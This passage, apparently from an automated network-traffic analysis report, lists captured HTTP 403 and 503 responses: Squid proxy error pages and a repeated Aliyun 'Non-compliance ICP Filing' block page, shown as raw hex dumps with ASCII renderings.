3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:54 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: closeContent-Type: text/htmlCache-Control: no-cacheX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffContent-Length: 4872Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 38 3b 20 49 45 3d 45 44 47 45 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 61 36 61 36 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 64 61 74 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 70 61 73 73 77 6f 72 64 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 78 74 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 69 6d 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 75 72 6c 5d 2c 20 73 65 6c 65 63 74 2c 20 74 65 78 74 61 72 65 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 36 32 36 32 36 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:55 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.14Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:55 GMTContent-Type: text/html;charset=utf-8Content-Length: 3846X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0
